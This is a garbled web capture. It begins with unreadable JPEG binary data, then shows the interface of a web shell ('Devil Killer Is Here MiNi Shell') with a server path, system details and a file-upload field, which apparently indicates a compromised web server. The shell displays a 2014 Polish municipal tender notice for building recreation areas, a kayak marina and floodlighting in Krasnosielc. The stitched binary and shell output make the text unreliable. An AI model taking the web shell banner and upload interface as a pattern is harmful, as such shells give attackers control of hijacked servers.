JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140410/123248-N-2014.html

<p class="kh_header"><b>Krasnosielc: Budowa przystani kajakowej i placów rekreacyjnych w m. Karolewo, 
Grądy, Chłopia Łąka oraz budowa placu rekreacyjnego wraz z miniboiskiem wielofunkcyjnym w Woli Włościańskiej i zakup reflektorów</b><br>
<b>Numer ogłoszenia: 123248 - 2014; data zamieszczenia: 10.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Krasnosielc , Rynek 40, 06-212 Krasnosielc, woj. mazowieckie, tel. 029 7175073, faks 029 7175074.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krasnosielc.bipst.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przystani kajakowej i placów rekreacyjnych w m. Karolewo, 
Grądy, Chłopia Łąka oraz budowa placu rekreacyjnego wraz z miniboiskiem wielofunkcyjnym w Woli Włościańskiej i zakup reflektorów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie placów rekreacyjnych, przystani kajakowej oraz placu rekreacyjnego wraz z miniboiskiem w Woli Włościańskiej oraz zakup i montaż reflektorów do iluminacji. Zakres robót:
Grądy:- rozbiórka budynku gospodarczego, roboty pomiarowe, mechaniczne zdjęcie warstwy ziemi urodzajnej spycharką, mechaniczne profilowanie i zagęszczanie podłoża, obrzeża betonowe o wymiarach 30x8 cm na podsypce cementowo-piaskowej, ława pod obrzeża betonowa z oporem z betonu, podbudowa z kruszywa naturalnego, rozścielenie ziemi urodzajnej spycharkami na terenie płaskim, ułożenie trawników z rolki na gruncie kat. III bez nawożenia, sadzenie krzewów żywopłotowych w rowach z całkowitą zaprawą rowów, wyposażenie placu zabaw.
Chłopia Łąka:- roboty pomiarowe przy powierzchniowych robotach ziemnych, mechaniczne zdjęcie warstwy ziemi urodzajnej spycharką, profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne, obrzeża betonowe o wymiarach 30x8 na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą, ława pod obrzeża betonowa z oporem z betonu, podbudowa z kruszywa naturalnego, dostawa ziemi urodzajnej, rozścielenie ziemi urodzajnej spycharkami, ułożenie trawników z rolki na gruncie kat. III bez nawożenia, roboty ziemne z przewozem gruntu taczkami na odległość do 20m-wykopy pod słupki ogrodzeniowe, stopy fundamentowe betonowe, ogrodzenie systemowe panelowe przetłaczane, panele z drutów fi 4mm zgrzewanych ocynkowanych ogniowo, ogrodzenie kompletne bez podmurówki, furtka ogrodzeniowa szer. 1m z systemowych paneli przetłaczanych z regulowanymi zawiasami, ręczne plantowanie nawierzchni gruntu rodzimego, sadzenie krzewów żywopłotowych w rowach z całkowitą zaprawą rowów, wyposażenie placu zabaw.
Karolewo:- roboty pomiarowe przy powierzchniowych robotach ziemnych, mechaniczne zdjęcie warstwy ziemi urodzajnej spycharką, profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne, obrzeża betonowe o wymiarach 30x8 na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą, ława pod obrzeża betonowa z oporem z betonu, podbudowa z kruszywa naturalnego, dostawa ziemi urodzajnej, rozścielenie ziemi urodzajnej spycharkami, ułożenie trawników z rolki na gruncie kat. III bez nawożenia, roboty ziemne z przewozem gruntu taczkami na odległość do 20m-wykopy pod słupki ogrodzeniowe, stopy fundamentowe betonowe, ogrodzenie systemowe panelowe przetłaczane, panele z drutów fi 4mm zgrzewanych ocynkowanych ogniowo, ogrodzenie kompletne bez podmurówki, furtka ogrodzeniowa szer. 1m z systemowych paneli przetłaczanych z regulowanymi zawiasami, ręczne plantowanie nawierzchni gruntu rodzimego, sadzenie krzewów żywopłotowych w rowach z całkowitą zaprawą rowów, wyposażenie placu zabaw.
Budowa przystani kajakowej:- roboty pomiarowe przy powierzchniowych robotach ziemnych, mechaniczne zdjęcie warstwy urodzajnej spycharką, mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, podbudowa z kruszywa naturalnego-warstwa o grubości 30cm po zagęszczeniu, podbudowa z kruszywa naturalnego - warstwa po zagęszczeniu 35 cm - nasyp pod przystań kajakową, dostawa i montaż elementów wyposażenia.
Budowa placu zabaw i mini boiska wielofunkcyjnego: 
Boisko wielofunkcyjne - roboty pomiarowe przy powierzchniowych robotach ziemnych, mechaniczne zdjęcie warstwy ziemi urodzajnej spycharką, mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, obrzeża betonowe 30x8 na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą cementową, podbudowa z kruszywa naturalnego - warstwa o grubości po zagęszczeniu 20cm, dostawa ziemi urodzajnej, rozścieleni ziemi urodzajnej spycharkami, ułożenie trawników z rolki na gruncie kat. III bez nawożenia, dostawa i montaż bramki do piłki ręcznej, przenośnej aluminiowej 3x2m wraz z siatką do bramki PE.
Plac zabaw-  mechaniczne zdjęcie warstwy ziemi urodzajnej spycharką, mechaniczne profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni, obrzeża betonowe 30x8 na podsypce cementowo-piaskowej z wypełnieniem spoin zaprawą cementową, podbudowa z kruszywa naturalnego - warstwa o grubości po zagęszczeniu 20cm, dostawa i montaż wyposażenia placu zabaw, roboty ziemne z przewozem gruntu taczkami na odległość 20m - wykopy pod słupki ogrodzeniowe, stopy fundamentowe - ręczne układanie betonu, ogrodzenie systemowe panelowe przetłaczane,  panele z drutów fi 4mm zgrzewanych ocynkowanych ogniowo, ogrodzenie kompletne bez podmurówki, furtka ogrodzeniowa szer. 1,1m z systemowych paneli przetłaczanych z regulowanymi zawiasami+ 2 słupy 80x80mm, ręczne plantowanie powierzchni gruntu rodzimego.
Zakup i montaż reflektorów do iluminacji:
Kapliczka w Krasnosielcu 
oprawa 1, ilość 1szt,  budowa oprawy jednokomorowa, materiał korpusu - odlew aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK08, materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP66, dostęp do komory osprzętu i optycznej - bez użycia narzędzi, uchwyt montażowy z podziałką, umożliwiający regulację kąta nachylenia oprawy, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa metalohalogenowa o mocy 150W, klasa ochronności elektrycznej I lub II, soczewka, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.
oprawa 2, ilość 2, budowa oprawy jednokomorowa, materiał korpusu - odlew aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK10, nacisk statyczny 4000kg,  materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP67, możliwość regulacji kąta nachylenia odbłyśnika, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa sodowa o mocy 70W, klasa ochronności elektrycznej I, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.

Kościół w Drążdżewie Małym
oprawa 1, ilość 1szt,  budowa oprawy jednokomorowa, materiał korpusu - odlew    aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK08, materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP66, dostęp do komory osprzętu i optycznej - bez użycia narzędzi, uchwyt montażowy z podziałką, umożliwiający regulację kąta nachylenia oprawy, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa metalohalogenowa o mocy 150W, klasa ochronności elektrycznej I lub II, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.
Oprawa 2, ilość 1szt,  budowa oprawy jednokomorowa, materiał korpusu - odlew    aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK08, materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP66, dostęp do komory osprzętu i optycznej - bez użycia narzędzi, uchwyt montażowy z podziałką, umożliwiający regulację kąta nachylenia oprawy, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa metalohalogenowa o mocy 250W, klasa ochronności elektrycznej I lub II, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.
Kościół w Amelinie.
oprawa 1, ilość 1szt,  budowa oprawy jednokomorowa, materiał korpusu - odlew    aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK08, materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP66, dostęp do komory osprzętu i optycznej - bez użycia narzędzi, uchwyt montażowy z podziałką, umożliwiający regulację kąta nachylenia oprawy, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa metalohalogenowa o mocy 150W, klasa ochronności elektrycznej I lub II, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.
Oprawa 2, ilość 1szt,  budowa oprawy jednokomorowa, materiał korpusu - odlew    aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK08, materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP66, dostęp do komory osprzętu i optycznej - bez użycia narzędzi, uchwyt montażowy z podziałką, umożliwiający regulację kąta nachylenia oprawy, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa metalohalogenowa o mocy 250W, klasa ochronności elektrycznej I lub II, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.
Kościół w Krasnosielcu.
- oprawa 1, ilość 4szt,  budowa oprawy jednokomorowa, materiał korpusu - odlew    aluminium, materiał klosza - szkło hartowane, stopień odporności klosza na uderzenia mechaniczne - IK08, materiał odbłyśnika - aluminium tłoczone i polerowane, szczelność oprawy - IP66, dostęp do komory osprzętu i optycznej - bez użycia narzędzi, uchwyt montażowy z podziałką, umożliwiający regulację kąta nachylenia oprawy, znamionowe napięcie pracy -230V/50Hz, źródło światła - wysokoprężna lampa metalohalogenowa o mocy 150W, klasa ochronności elektrycznej I lub II, soczewka, oprawa powinna posiadać deklarację zgodności WE, dane fotometryczne oprawy zamieszczone w programie komputerowym pozwalającym wykonać obliczenia parametrów oświetleniowych.
  
W trakcie realizacji inwestycji Wykonawca: 
- dokona urządzenia placu budowy i poniesie koszty utrzymania zaplecza budowy; 
- zabezpieczy składowane tymczasowo na placu budowy materiały i urządzenia, do czasu ich wbudowania, przed zniszczeniem, uszkodzeniem lub utratą jakości, właściwości lub parametrów oraz udostępni do kontroli przez inspektora nadzoru inwestorskiego oraz pracowników Zamawiającego; 
- zapewni ochronę terenów przyległych do placu budowy i poniesie odpowiedzialność cywilną za ewentualne szkody wynikłe z tytułu prowadzonych prac wobec osób trzecich;
- wykona inwentaryzację geodezyjną powykonawczą w ilości 2 egz.  w wersji papierowej i elektronicznej w wersji PDF lub JPG wraz z oświadczeniem geodety o wykonaniu robót zgodnie umową;
Wykonawca przez cały okres robót budowlanych umożliwi wstęp na teren budowy            inspektorowi nadzoru inwestorskiego oraz upoważnionym pracownikom Zamawiającego włącznie z możliwością wglądu do dokumentacji budowy.

Wykonawca wraz z pisemnym zgłoszeniem zakończenia robót przedłoży Zamawiającemu wszystkie dokumenty pozwalające na ocenę prawidłowości wykonania przedmiotu odbioru a w szczególności: dokumentację geodezyjną powykonawczą, oświadczenia kierownika budowy i kierowników robót, protokoły z wyników badań, certyfikaty, atesty i deklaracje zgodności na wbudowane materiały. 

Dokumentacja powykonawcza podlega odbiorowi częściowemu przez inspektora nadzoru. Na co najmniej 7 dni przed dniem odbioru Wykonawca przedłoży Inspektorowi dokumentację powykonawczą. Inspektor zbada stan dokumentacji powykonawczej. W przypadku stwierdzenia wad, zwróci ją do poprawki.

Dokumentacja powykonawcza powinna zawierać:
1. wykaz przekazywanej dokumentacji powykonawczej (kompletny, wyszczególnione i opisane wszystkie tomy, teczki, segregatory itp.);
2. protokoły przeprowadzonych odbiorów częściowych, pomiarów, badań i sprawdzeń;
3. dokumentację fabryczną (atesty), certyfikaty, deklaracje zgodności, protokoły jakości zabudowanych urządzeń i materiałów;

Szczegółowy zakres robót określa dokumentacja projektowa, a dołączone do przetargu przedmiary mają charakter pomocniczy.
Wszystkie materiały muszą posiadać aktualną aprobatę techniczną lub certyfikat zgodności z odpowiednimi normami..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.11.27.23-9, 45.22.38.00-4, 45.11.12.00-0, 45.34.20.00-6, 37.50.00.00-3, 45.11.27.10-5, 45.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9 000,00  zł. (słownie:dziewięć tysięcy złotych)

1. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) Pieniądzu na konto Urzędu Gminy w Krasnosielcu, BS Krasnosielc Nr 15 8917 0001 0000 0026 2000 0030,
2) Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się na rachunku bankowym zamawiającego przed upływem terminu (godziny) przewidzianego na wniesienie wadium,
3) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym- oryginał należy dołączyć do oferty,
4) gwarancjach bankowych - oryginał należy dołączyć do oferty,
5) gwarancjach ubezpieczeniowych - oryginał należy dołączyć do oferty,
6) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.) oryginał należy dołączyć do oferty.
2.  Zwrot wadium 
1) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a.
2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, 
3) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed terminem składania ofert.
3.  Wadium wniesione w formie gwarancji bankowej lub ubezpieczeniowej musi zawierać klauzulę gwarantujące bezwarunkową wypłatę na rzecz zamawiającego w przypadku wystąpienia okoliczności wymienionych w art. 46 ust. 4a i ust 5 ustawy. 
4.  Wadium musi obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że:
 posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli   
przepisy prawa  nakładają obowiązek posiadania takich uprawnień. 
Zamawiający informuje, iż powyższe zamówienie nie wymaga posiada koncesji ani    
 zezwoleń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że:
Wykonawca w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał z należytą starannością co najmniej dwa zadania o wartości 
min. 400 000 zł brutto, odpowiadające swoim rodzajem i wartością, robotom budowlanym (budowa placów rekreacyjnych) stanowiącym przedmiot zamówienia  , oraz załączy dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.		
Ocena spełnienia warunku nastąpi na podstawie załączonych przez  Wykonawcę do oferty  dokumentów i oświadczeń, wymienionych w pkt 6.3), 6.2) SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnia  warunku nastąpi na podstawie złożonego oświadczenia
 wymienionego w pkt 6.2) SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że:
dysponuje osobami do kierowania robotami budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych.(kierownik budowy branża konstrukcyjno budowlana oraz elektryczna,). 
Ocena spełnienia warunku nastąpi na podstawie załączonych przez  Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt 6.4), 6.2) SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiada zdolność kredytową lub posiadanie środków finansowych na kwotę 400 000 zł. 
- posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że    wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 400 000 zł
Ocena spełnienia warunku nastąpi na podstawie załączonych przez  Wykonawcę do oferty dokumentów i oświadczeń, wymienionych w pkt 6.16), 6.17), 6.2) SIWZ. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

